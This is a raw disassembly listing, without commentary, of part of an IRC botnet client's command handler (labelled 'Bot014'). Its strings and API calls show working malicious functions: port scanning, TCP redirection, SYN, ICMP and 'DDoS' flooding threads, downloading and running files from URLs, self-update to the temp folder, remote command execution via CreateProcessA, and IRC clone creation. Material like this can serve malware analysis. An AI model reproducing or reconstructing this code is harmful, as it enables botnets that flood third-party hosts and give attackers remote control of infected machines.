add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_414EE0
mov esi, eax
push esi
lea eax, [ebp+var_2F0]
push offset dword_426F6C
push eax
call sub_414415
add esp, 14h
test esi, esi
jz loc_40E4AE
mov edi, [ebp+var_8]
push edi
call sub_4147A2
test eax, eax
pop ecx
jle loc_40E4AE
push edi
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_10]
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_4056BF
push edi
call sub_4147A2
imul eax, 234h
add esp, 18h
cmp byte ptr dword_4364A0[eax], 73h
jnz loc_40E4AE
push esi
push edi
call sub_4147A2
imul eax, 234h
pop ecx
add eax, offset byte_4366B8
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_40AE6A: ; CODE XREF: sub_4089DC+25A9�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
jmp loc_40D106
; ---------------------------------------------------------------------------
loc_40AE94: ; CODE XREF: sub_4089DC+2346�j
; sub_4089DC+235A�j
push [ebp+var_8]
call sub_4147A2
imul eax, 234h
cmp byte_4366B8[eax], 0
pop ecx
jz loc_40E4AE
mov edi, [ebp+var_14]
test edi, edi
jz loc_40E4AE
mov eax, [ebp+var_18]
lea edx, [eax+1]
loc_40AEC1: ; CODE XREF: sub_4089DC+24EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AEC1
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40AED2: ; CODE XREF: sub_4089DC+24FB�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AED2
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40AEE3: ; CODE XREF: sub_4089DC+250C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AEE3
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
mov edi, [ebp+var_8]
push edi
call sub_4147A2
test eax, eax
pop ecx
jle loc_40E4AE
push edi
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_4056BF
push edi
call sub_4147A2
imul eax, 234h
add esp, 18h
cmp byte ptr dword_4364A0[eax], 73h
jnz loc_40E4AE
push esi
push edi
call sub_4147A2
imul eax, 234h
pop ecx
add eax, offset byte_4366B8
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_40AE6A
; ---------------------------------------------------------------------------
loc_40AF8A: ; CODE XREF: sub_4089DC+231E�j
; sub_4089DC+2332�j
push [ebp+var_8]
call dword_43587C ; inet_addr
push [ebp+var_10]
mov [ebp+var_308], eax
call sub_4147A2
push [ebp+arg_0]
mov [ebp+var_314], eax
call sub_4147A2
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_310], eax
lea eax, [ebp+var_394]
push eax
mov [ebp+var_398], edi
call sub_4144A0
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_310]
mov [ebp+var_300], ebx
push [ebp+var_314]
mov [ebp+var_2FC], eax
push [ebp+var_308]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_2F0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_414415
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_41229A
add esp, 20h
mov [ebp+var_30C], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_398]
push eax
push offset sub_40FDCB
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_30C]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40B073
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40B4F0
; ---------------------------------------------------------------------------
loc_40B06B: ; CODE XREF: sub_4089DC+269D�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B073: ; CODE XREF: sub_4089DC+267C�j
cmp [ebp+var_2F8], esi
jz short loc_40B06B
jmp loc_40B4FF
; ---------------------------------------------------------------------------
loc_40B080: ; CODE XREF: sub_4089DC+22F6�j
; sub_4089DC+230A�j
push [ebp+var_8]
call sub_4147A2
push 7Fh
push [ebp+var_10]
mov [ebp+var_F0C], eax
lea eax, [ebp+var_1010]
push eax
call sub_4144A0
push [ebp+arg_0]
call sub_4147A2
push [ebp+var_A0]
mov esi, [ebp+arg_4]
mov [ebp+var_F10], eax
lea eax, [ebp+var_F90]
push 80h
push eax
mov [ebp+var_1018], esi
call sub_41466D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_F10]
mov [ebp+var_EFC], eax
lea eax, [ebp+var_1010]
push eax
push [ebp+var_F0C]
mov [ebp+var_F00], ebx
push esi
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_414415
xor edi, edi
push edi
lea eax, [ebp+var_2F0]
push 11h
push eax
call sub_41229A
add esp, 24h
mov [ebp+var_F08], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_1018]
push eax
push offset sub_40EE88
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_F08]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40B170
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_40B2E0
; ---------------------------------------------------------------------------
loc_40B168: ; CODE XREF: sub_4089DC+279A�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B170: ; CODE XREF: sub_4089DC+2779�j
cmp [ebp+var_EF8], edi
jz short loc_40B168
jmp loc_40B2EF
; ---------------------------------------------------------------------------
loc_40B17D: ; CODE XREF: sub_4089DC+22CE�j
; sub_4089DC+22E2�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_C84]
push eax
call sub_4144A0
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_980], edi
call sub_4147A2
mov [ebp+var_97C], eax
mov eax, [ebp+ebx+var_98]
add esp, 10h
cmp eax, edi
jz short loc_40B1CA
push 10h
push edi
push eax
call sub_415239
add esp, 0Ch
mov [ebp+var_974], eax
jmp short loc_40B1D0
; ---------------------------------------------------------------------------
loc_40B1CA: ; CODE XREF: sub_4089DC+27D8�j
mov [ebp+var_974], edi
loc_40B1D0: ; CODE XREF: sub_4089DC+27EC�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, edi
jz short loc_40B1EA
push ebx
call sub_4147A2
pop ecx
mov [ebp+var_978], eax
jmp short loc_40B1F0
; ---------------------------------------------------------------------------
loc_40B1EA: ; CODE XREF: sub_4089DC+27FD�j
mov [ebp+var_978], edi
loc_40B1F0: ; CODE XREF: sub_4089DC+280C�j
push 3Fh
push [ebp+var_10]
call sub_4158C0
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40B22A
and byte ptr [ebx], 0
inc ebx
loc_40B206: ; CODE XREF: sub_4089DC+283B�j
push 26h
push ebx
call sub_4158C0
cmp eax, edi
pop ecx
pop ecx
jz short loc_40B219
mov byte ptr [eax], 20h
jmp short loc_40B206
; ---------------------------------------------------------------------------
loc_40B219: ; CODE XREF: sub_4089DC+2836�j
push esi
lea eax, [ebp+var_A84]
push ebx
push eax
call sub_4144A0
add esp, 0Ch
loc_40B22A: ; CODE XREF: sub_4089DC+2824�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_B84]
push eax
call sub_4144A0
movzx eax, [ebp+var_457]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_970], eax
lea eax, [ebp+var_D04]
push eax
mov [ebp+var_D08], esi
call sub_4144A0
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_96C], eax
lea eax, [ebp+var_2F0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_968], ebx
call sub_414415
push esi
lea eax, [ebp+var_2F0]
push 16h
push eax
call sub_41229A
add esp, 34h
mov [ebp+var_984], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_D08]
push eax
push offset sub_4025CE
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_984]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40B315
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
loc_40B2E0: ; CODE XREF: sub_4089DC+2787�j
; sub_4089DC+440A�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
loc_40B2EF: ; CODE XREF: sub_4089DC+279C�j
; sub_4089DC+2941�j ...
cmp [ebp+var_C], edi
jnz loc_40D9C2
push edi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push esi
jmp loc_40D9BA
; ---------------------------------------------------------------------------
loc_40B30D: ; CODE XREF: sub_4089DC+293F�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B315: ; CODE XREF: sub_4089DC+28F6�j
cmp [ebp+var_964], edi
jz short loc_40B30D
jmp short loc_40B2EF
; ---------------------------------------------------------------------------
loc_40B31F: ; CODE XREF: sub_4089DC+22A6�j
; sub_4089DC+22BA�j
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_18D4]
push eax
call sub_4144A0
push esi
push [ebp+var_10]
lea eax, [ebp+var_1854]
push eax
call sub_4144A0
push esi
push [ebp+arg_0]
lea eax, [ebp+var_17D4]
push eax
call sub_4144A0
push esi
push [ebp+var_A0]
lea eax, [ebp+var_1754]
push eax
call sub_4144A0
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_16CC], eax
lea eax, [ebp+var_2F0]
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax
mov [ebp+var_16D0], ebx
mov [ebp+var_18D8], edi
call sub_414415
add esp, 44h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Ch
push eax
call sub_41229A
add esp, 0Ch
mov [ebp+var_16D4], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_18D8]
push eax
push offset sub_4114B6
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_16D4]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40B3FF
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
jmp loc_40B4F0
; ---------------------------------------------------------------------------
loc_40B3F7: ; CODE XREF: sub_4089DC+2A29�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B3FF: ; CODE XREF: sub_4089DC+2A08�j
cmp [ebp+var_16C8], esi
jz short loc_40B3F7
jmp loc_40B4FF
; ---------------------------------------------------------------------------
loc_40B40C: ; CODE XREF: sub_4089DC+226A�j
; sub_4089DC+227E�j ...
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_1B64]
push eax
call sub_4144A0
push esi
push [ebp+var_10]
lea eax, [ebp+var_1AE4]
push eax
call sub_4144A0
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1A64]
push eax
call sub_4144A0
push esi
push [ebp+var_A0]
lea eax, [ebp+var_19E4]
push eax
call sub_4144A0
push 20h
push [ebp+var_18]
lea eax, [ebp+var_1964]
push eax
call sub_4144A0
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_18E0], eax
lea eax, [ebp+var_2F0]
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax
mov [ebp+var_18E4], ebx
mov [ebp+var_1B6C], edi
call sub_414415
add esp, 50h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Bh
push eax
call sub_41229A
add esp, 0Ch
mov [ebp+var_1B68], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_1B6C]
push eax
push offset sub_402500
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1B68]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40B525
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40B4F0: ; CODE XREF: sub_4089DC+268A�j
; sub_4089DC+2A16�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
loc_40B4FF: ; CODE XREF: sub_4089DC+269F�j
; sub_4089DC+2A2B�j ...
cmp [ebp+var_C], esi
jnz loc_40D9C2
push esi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push edi
jmp loc_40D9BA
; ---------------------------------------------------------------------------
loc_40B51D: ; CODE XREF: sub_4089DC+2B4F�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B525: ; CODE XREF: sub_4089DC+2B06�j
cmp [ebp+var_18DC], esi
jz short loc_40B51D
jmp short loc_40B4FF
; ---------------------------------------------------------------------------
loc_40B52F: ; CODE XREF: sub_4089DC+2242�j
; sub_4089DC+2256�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_15BC]
push eax
call sub_4144A0
push [ebp+var_10]
call sub_4147A2
push 3Fh
push [ebp+arg_0]
mov [ebp+var_146C], eax
lea eax, [ebp+var_153C]
push eax
call sub_4144A0
mov ebx, [ebp+ebx+var_98]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40B581
push 3Fh
lea eax, [ebp+var_14FC]
push ebx
push eax
call sub_4144A0
add esp, 0Ch
loc_40B581: ; CODE XREF: sub_4089DC+2B91�j
lea eax, [ebp+var_153C]
push eax
push [ebp+var_146C]
lea eax, [ebp+var_15BC]
push eax
lea eax, [ebp+var_2F0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_1468], 1
call sub_414415
push esi
lea eax, [ebp+var_2F0]
push 18h
push eax
call sub_41229A
add esp, 20h
mov [ebp+var_1464], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_15C0]
push eax
push offset sub_40887D
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1464]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40B610
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40C3BF
; ---------------------------------------------------------------------------
loc_40B608: ; CODE XREF: sub_4089DC+2C3A�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B610: ; CODE XREF: sub_4089DC+2C19�j
cmp [ebp+var_1460], esi
jz short loc_40B608
jmp loc_40C3CE
; ---------------------------------------------------------------------------
loc_40B61D: ; CODE XREF: sub_4089DC+2208�j
; sub_4089DC+221C�j
push [ebp+var_10]
call sub_4147A2
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_D24], eax
jle loc_40B71C
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_EAC]
push esi
push eax
call sub_41466D
push [ebp+var_A0]
xor eax, eax
cmp [ebp+var_44A], al
push esi
setnz al
mov [ebp+var_EB0], ebx
mov [ebp+var_D20], eax
lea eax, [ebp+var_DAC]
push eax
call sub_41466D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_D1C], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_D18], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
push edi
lea eax, [ebp+var_2F0]
push 0Eh
push eax
call sub_41229A
add esp, 38h
mov [ebp+var_D2C], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_EB0]
push eax
push offset sub_40532B
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_D2C]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40B712
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_414415
add esp, 0Ch
jmp short loc_40B72F
; ---------------------------------------------------------------------------
loc_40B70A: ; CODE XREF: sub_4089DC+2D3C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B712: ; CODE XREF: sub_4089DC+2D0F�j
cmp [ebp+var_D14], edi
jz short loc_40B70A
jmp short loc_40B72F
; ---------------------------------------------------------------------------
loc_40B71C: ; CODE XREF: sub_4089DC+2C57�j
lea eax, [ebp+var_2F0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_414415
pop ecx
pop ecx
loc_40B72F: ; CODE XREF: sub_4089DC+2D2C�j
; sub_4089DC+2D3E�j
cmp [ebp+var_C], edi
jnz loc_40D9C2
push edi
push [ebp+var_4]
loc_40B73C: ; CODE XREF: sub_4089DC+5636�j
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push ebx
jmp loc_40D9BA
; ---------------------------------------------------------------------------
loc_40B74F: ; CODE XREF: sub_4089DC+21E0�j
; sub_4089DC+21F4�j
push [ebp+var_10]
push [ebp+var_8]
call ds:dword_4200F4 ; MoveFileA
test eax, eax
jz short loc_40B783
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_41466D
add esp, 14h
jmp loc_40D99F
; ---------------------------------------------------------------------------
loc_40B783: ; CODE XREF: sub_4089DC+2D81�j
push offset aFile ; "[FILE]:"
call sub_4067EA
push eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
add esp, 10h
jmp loc_40D99F
; ---------------------------------------------------------------------------
loc_40B7A7: ; CODE XREF: sub_4089DC+21B8�j
; sub_4089DC+21CC�j
push [ebp+var_8]
lea eax, [ebp+var_13D0]
push 104h
push eax
call sub_41466D
xor esi, esi
add esp, 0Ch
cmp [ebp+var_14], esi
jz short loc_40B7E5
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
cmp eax, esi
pop ecx
pop ecx
jz short loc_40B7E5
push eax
lea eax, [ebp+var_12CC]
push eax
call sub_414415
pop ecx
pop ecx
loc_40B7E5: ; CODE XREF: sub_4089DC+2DE7�j
; sub_4089DC+2DF8�j
push [ebp+var_A0]
lea eax, [ebp+var_1450]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov [ebp+var_1454], eax
mov eax, [ebp+var_4]
mov [ebp+var_11C4], eax
mov eax, [ebp+var_C]
mov [ebp+var_11C0], eax
lea eax, [ebp+var_12CC]
push eax
lea eax, [ebp+var_13D0]
push eax
push offset aFindfileSear_0 ; "[FINDFILE]: Searching for file: %s in: "...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
push esi
lea eax, [ebp+var_2F0]
push 1Ch
push eax
call sub_41229A
add esp, 2Ch
mov [ebp+var_11C8], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_1454]
push eax
push offset sub_40308F
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_11C8]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40B8AA
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFindfileFailed ; "[FINDFILE]: Failed to start search thre"...
loc_40B88E: ; CODE XREF: sub_4089DC+4135�j
; sub_4089DC+4EC8�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_40B8A2: ; CODE XREF: sub_4089DC+2ED4�j
push 32h
call ds:dword_420000 ; Sleep
loc_40B8AA: ; CODE XREF: sub_4089DC+2EA4�j
cmp [ebp+var_11BC], esi
jz short loc_40B8A2
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_40B8B7: ; CODE XREF: sub_4089DC+2190�j
; sub_4089DC+21A4�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_400]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_400], 44h
mov [ebp+var_3D4], ebx
mov word ptr [ebp+var_3D0], si
call sub_4147A2
cmp eax, ebx
pop ecx
jnz short loc_40B8F6
mov word ptr [ebp+var_3D0], 5
loc_40B8F6: ; CODE XREF: sub_4089DC+2F0F�j
cmp [ebp+var_14], esi
jz loc_40C3CE
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40C3CE
lea eax, [ebp+var_7C0]
push eax
lea eax, [ebp+var_400]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call ds:dword_420038 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40B94F
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_414415
pop ecx
pop ecx
jmp loc_40C3CE
; ---------------------------------------------------------------------------
loc_40B94F: ; CODE XREF: sub_4089DC+2F5F�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40C3C5
; ---------------------------------------------------------------------------
loc_40B95A: ; CODE XREF: sub_4089DC+2168�j
; sub_4089DC+217C�j
mov edi, [ebp+var_10]
mov esi, offset aBot014 ; "Bot014"
loc_40B962: ; CODE XREF: sub_4089DC+2FA2�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40B984
test al, al
jz short loc_40B980
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40B984
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40B962
loc_40B980: ; CODE XREF: sub_4089DC+2F90�j
xor eax, eax
jmp short loc_40B989
; ---------------------------------------------------------------------------
loc_40B984: ; CODE XREF: sub_4089DC+2F8C�j
; sub_4089DC+2F9A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40B989: ; CODE XREF: sub_4089DC+2FA6�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40BAFC
lea eax, [ebp+var_8D0]
push eax
push 104h
call ds:dword_4200D0 ; GetTempPathA
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_C84]
push eax
call sub_4144A0
lea eax, [ebp+var_7CC]
push eax
call sub_40F9BF
push eax
lea eax, [ebp+var_8D0]
push eax
lea eax, [ebp+var_B84]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_414415
mov eax, [ebp+ebx+var_9C]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_980], 1
mov [ebp+var_97C], esi
jz short loc_40BA13
push 10h
push esi
push eax
call sub_415239
add esp, 0Ch
mov [ebp+var_974], eax
jmp short loc_40BA19
; ---------------------------------------------------------------------------
loc_40BA13: ; CODE XREF: sub_4089DC+3021�j
mov [ebp+var_974], esi
loc_40BA19: ; CODE XREF: sub_4089DC+3035�j
mov ebx, [ebp+ebx+var_98]
cmp ebx, esi
jz short loc_40BA33
push ebx
call sub_4147A2
pop ecx
mov [ebp+var_978], eax
jmp short loc_40BA39
; ---------------------------------------------------------------------------
loc_40BA33: ; CODE XREF: sub_4089DC+3046�j
mov [ebp+var_978], esi
loc_40BA39: ; CODE XREF: sub_4089DC+3055�j
movzx eax, [ebp+var_457]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_970], eax
lea eax, [ebp+var_D04]
push eax
mov [ebp+var_D08], edi
call sub_4144A0
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_968], eax
mov eax, [ebp+var_C]
mov [ebp+var_96C], eax
lea eax, [ebp+var_2F0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_414415
push edi
lea eax, [ebp+var_2F0]
push 17h
push eax
call sub_41229A
add esp, 24h
mov [ebp+var_984], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_D08]
push eax
push offset sub_4025CE
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_984]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40BAF2
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_414415
add esp, 0Ch
jmp short loc_40BAFE
; ---------------------------------------------------------------------------
loc_40BAEA: ; CODE XREF: sub_4089DC+311C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40BAF2: ; CODE XREF: sub_4089DC+30EF�j
cmp [ebp+var_964], esi
jz short loc_40BAEA
jmp short loc_40BAFE
; ---------------------------------------------------------------------------
loc_40BAFC: ; CODE XREF: sub_4089DC+2FB2�j
xor esi, esi
loc_40BAFE: ; CODE XREF: sub_4089DC+310C�j
; sub_4089DC+311E�j
cmp [ebp+var_C], esi
jnz loc_40A0E4
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push edi
jmp loc_40A0DC
; ---------------------------------------------------------------------------
loc_40BB1E: ; CODE XREF: sub_4089DC+2140�j
; sub_4089DC+2154�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C5A
cmp [ebp+var_14], eax
jz loc_408C5A
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
push eax
push [ebp+var_A0]
lea eax, [ebp+var_2F0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_414415
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4144A0
push [ebp+var_8]
call sub_4147A2
add esp, 30h
test eax, eax
jle short loc_40BBA7
push [ebp+var_8]
call sub_4147A2
imul eax, 3E8h
pop ecx
push eax
call ds:dword_420000 ; Sleep
loc_40BBA7: ; CODE XREF: sub_4089DC+31B3�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401EFF
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40BBBB: ; CODE XREF: sub_4089DC+2118�j
; sub_4089DC+212C�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C5A
cmp [ebp+var_14], eax
jz loc_40E4AE
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_414EE0
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2F0]
push ebx
jz short loc_40BC75
push [ebp+var_A0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_414415
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4144A0
push ebx
lea eax, [ebp+var_2F0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_414415
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
push [ebp+var_8]
call sub_4147A2
add esp, 38h
test eax, eax
jle loc_40E4AE
push [ebp+var_8]
call sub_4147A2
add eax, [ebp+arg_24]
pop ecx
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40BC75: ; CODE XREF: sub_4089DC+3224�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40C1DF
; ---------------------------------------------------------------------------
loc_40BC7F: ; CODE XREF: sub_4089DC+20F0�j
; sub_4089DC+2104�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_414415
push [ebp+var_8]
call sub_4147A2
add esp, 10h
loc_40BC9E: ; CODE XREF: sub_4089DC+332F�j
test eax, eax
jle loc_40E4AE
push [ebp+var_8]
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
loc_40BCBA: ; CODE XREF: sub_4089DC+3B68�j
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push [ebp+var_8]
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_405674
jmp loc_40D64E
; ---------------------------------------------------------------------------
loc_40BCE5: ; CODE XREF: sub_4089DC+20C8�j
; sub_4089DC+20DC�j
push [ebp+ebx+var_9C]
